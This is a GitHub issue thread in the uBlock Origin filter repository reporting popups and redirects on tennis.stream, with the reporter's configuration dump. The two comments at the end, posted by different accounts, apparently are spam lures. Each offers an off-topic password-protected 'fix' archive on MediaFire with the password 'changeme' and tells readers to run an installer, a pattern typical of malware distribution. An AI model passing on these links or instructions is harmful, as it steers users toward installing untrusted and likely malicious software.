### ISSUE TITLE
tennis.stream: popups

### ISSUE THREAD

**Issue by peroleucopus** [uBlockOrigin/uAssets#25054]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://tennis.stream/grenier-h-vs-krueger-m-live-stream/c9708a1d?id=34657b6f`

### Category

[unknown]

### Description

Clicking any stream from this site causes redirects and popups

### Other extensions used

None

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Firefox: 129
filterset (summary):
 network: 247334
 cosmetic: 259854
 scriptlet: 54173
 html: 2191
listset (total-discarded, last-updated):
 added:
  adguard-generic: 84814-4144, now
  adguard-mobile: 9659-60, now
  adguard-spyware-url: 1662-124, now
  adguard-spyware: 77765-1546, now
  block-lan: 71-0, now
  curben-phishing: 505-2, now
  adguard-social: 23347-57, now
  adguard-cookies: 31296-57, now
  ublock-cookies-adguard: 1680-28, now
  adguard-popup-overlays: 27877-1017, now
  adguard-mobile-app-banners: 5422-27, now
  adguard-other-annoyances: 14914-410, now
  [11 lists not shown]: [too many]
 default:
  user-filters: 0-0, never
  ublock-filters: 39756-126, now
  ublock-badware: 10745-6, 1h.19m Δ
  ublock-privacy: 1065-4, 1h.19m Δ
  ublock-unbreak: 2556-1, 1h.19m Δ
  ublock-quick-fixes: 202-4, 1h.19m Δ
  easylist: 85556-2577, now
  easyprivacy: 53048-25566, now
  urlhaus-1: 28500-0, now
  plowe-0: 3545-1489, now
filterset (user): [empty]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 277 ms (selfie)
 maxAssetCacheWait: 127 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 2
 network:
  allsportsflix.xyz: 1
  googletagmanager.com: 1
 extended:
  ##a[href^="https://twitter.com/intent/tweet?"]
  ##a[href^="https://www.linkedin.com/sharing/"]
  ##a[href^="https://wa.me/?text="]
  ##a[href^="https://facebook.com/sharer/sharer.php?"]
  ##a[href^="https://telegram.me/share/url?"]
  ##a[title="Share on Facebook"]
  ##a[title="Share on Twitter"]
  ##a[href^="https://www.linkedin.com/sharing/share-offsite/?"]
```
</details>

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
